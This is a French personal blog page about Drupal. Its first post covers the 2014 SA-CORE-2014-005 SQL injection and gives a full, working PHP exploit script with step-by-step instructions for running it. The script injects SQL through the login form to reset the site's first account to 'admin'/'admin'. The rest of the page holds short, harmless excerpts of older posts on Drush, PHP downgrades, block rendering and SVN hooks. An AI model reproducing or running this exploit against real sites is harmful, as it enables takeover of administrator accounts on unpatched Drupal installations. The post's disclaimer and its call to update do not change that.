Florian's BlogA geek life

Les drupaliens invétérés le savent bien depuis ce mercredi 15 octobre : une faille de sécurité hautement critique, de type injection SQL et répondant au doux nom de SA-CORE-2014-005, vient d’être rendue publique.

Cette fois-ci, c’est du sérieux. Jugez plutôt avec cet exploit trouvé sans trop chercher…

Disclaimer : les informations qui suivent n’ont vocation qu’à illustrer le caractère critique de la faille de sécurité rapportée et n’engagent en aucun cas ma responsabilité.

Etape 1 : créer un fichier exploit.php avec le contenu suivant en modifiant au passage l’URL cible du site Drupal < 7.32 (dont vous êtes propriétaire, cela va sans dire) :

<?php

$url = 'http://www.mon-site.com'; // URL du site cible
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Ca a marché ! Tu peux t'authentifier avec l'utilisateur \"admin\" et le mot de passe \"admin\" sur {$url}user/login";
} else {
echo "Ca n'a pas marché : soit le site n'est pas vulnérable soit il n'a pu être chargé (problème de connexion Internet ?)...";
}

Etape 2 : exécuter le script

php exploit.php

Etape 3 : si le site est vulnérable, vous pouvez à présent vous authentifier sur http://www.mon-site.com/user/login avec le compte « admin », avec le mot de passe « admin ». Quelque peu flippant, n’est-ce pas ?..

Allez, qu’est-ce que tu attends ? File vite mettre à jour tes sites Drupal !..

Dans la vie d’un drupaler, la découverte de Drush s’apparente à la découverte du couteau par un néandertalien : bien des choses deviennent alors plus simples.

Parmi ces choses, on trouve la possibilité d’installer simplement un projet Drupal 7.
Lire la suite »

Alors oui, Ubuntu est récemment sortie dans sa version 10.04 LTS, c’est super, on a tous sautillé de joie.

Problème : quand on est un drupaler de la première heure et qu’on maintient encore des sites sous Drupal 5 (pas toujours possible d’upgrader en 6 stable), on risque de cumuler les infortunes avec la version 5.3 de PHP que cette nouvelle mouture de notre distrib préférée nous apporte.

En pareil cas, la seule solution qui tienne la route est malheureusement de downgrader en version 5.2…

Hep ! Ne pars pas ! Ce n’est pas si compliqué !

Lire la suite »

((/public/news/logo-drupal.png|Logo Drupal|L|Logo Drupal)) J’ai beau chercher, je ne trouve pas de fonction du genre block_view() ou block_render() dans les entrailles de notre bon –vieux– Drupal 6, ni dans celles de notre Drupal 7 –flambard– flambant neuf d’ailleurs. Ca serait bien pratique pour injecter des blocs dans des nodes et autres callbacks… Différentes solutions sont proposées dans le handbook Drupal et sur divers blogs, soit à base d’appels à module_invoke(‘block’, ‘block’, ‘view’, …) soit à via l’installation d’un module contrib. Je trouve ça un peu laborieux pour faire quelque chose de simple, et qui d’ailleurs devrait avoir sa place dans block.module à mon sens (mais c’est un autre débat). Je te livre donc ici ma recette {{KISS}} maison, une fonction simple et efficace !
Lire la suite »

[Mappy|http://fr.v3.mappy.com] a adopté [Drupal 6|http://www.drupal.org] pour la [version 3 de son site|http://fr.v3.mappy.com], actuellement en version beta. Il s’agit là d’une nouvelle référence majeure pour le [CMS et Framework PHP Drupal|http://www.drupal.org]. D’après ma rapide analyse, le site utilise a minima les modules suivants :%%% * issus de la communauté : cache, panels * spécifiques : mymappy, sitecrm, send_save_popup, poisearch, map

((/public/news/drupal_logo.png|drupal_logo.png|L|Drupal PHP hooks Subversion SVN)) Tout développeur ([PHP|http://www.php.net] ou pas) normalement constitué –a recours– devrait recourir à l’utilisation de [Subversion|http://subversion.tigris.org] pour gérer les versions de ses applications, faciliter le travail en équipe ou encore mettre en oeuvre des processus de déploiements automatisés. Or, quel développeur n’a jamais publié un code contenant une erreur de syntaxe ?%%% Quel développeur n’a jamais fait un commit « barbare », sans aucun commentaire ?%%% Quel développeur n’aurait pas aimé être prévenu d’un commit pour éviter un conflit SVN ?
Lire la suite »

((/images/news/drupal_logo.png|Drupal 5.0|L)) Je vous en parlais [il y a tout juste un an|http://florian.cathala.org/index.php/2006/01/23/20-drupal|fr|Drupal], [Drupal|http://drupal.org|en|Drupal] est un ??CMS|Content Management System?? fort attachant, de part ses fonctionnalités de base, sa légèreté (à peine plus de 1 Mo !), sa robustesse et la [richesse de ses contributions|http://drupal.org/project/Modules|en|Drupal contribs modules]. Après deux « releases candidates », la [version 5.0|http://drupal.org/node/109495|en|Drupal 5.0] vient tout juste de sortir des fourneaux.
Lire la suite »

((/images/news/drupal_logo.png|Drupal|C)) On le sait ??tous|nous autres les geeks??, il existe des tonnes de ??CMS|Content Management System??. Parmi les plus connus : [Plume|http://www.plume-cms.net/fr/], [Xoops|http://www.frxoops.org], [Joomla|http://www.joomla.org], [Typo3|http://typo3.org], [SPIP|http://www.spip.net/fr] … Et je suis tombé sur [Drupal|http://www.drupal.org], une formidable –usine à gaz– base de CMS, en fait un ??CMF|Content Management Framework??. Ce ??socle|framework en bon français?? de développement de sites est assez époustouflant par ses fonctionnalités de bases, mais surtout par les [modules additionnels|http://drupal.org/project/Modules], contributions d’??illustres développeurs inconnus|vive l’opensource??. Seule ombre au tableau : malgré l’ancienneté du projet, qui vient de fêter ses 5 ans, il n’y a encore que peu de sites fonctionnant sous [Drupal|http://www.drupal.org], ce qui le rend moins crédible qu’un [SPIP|http://www.spip.net/fr] et consors. Dommage …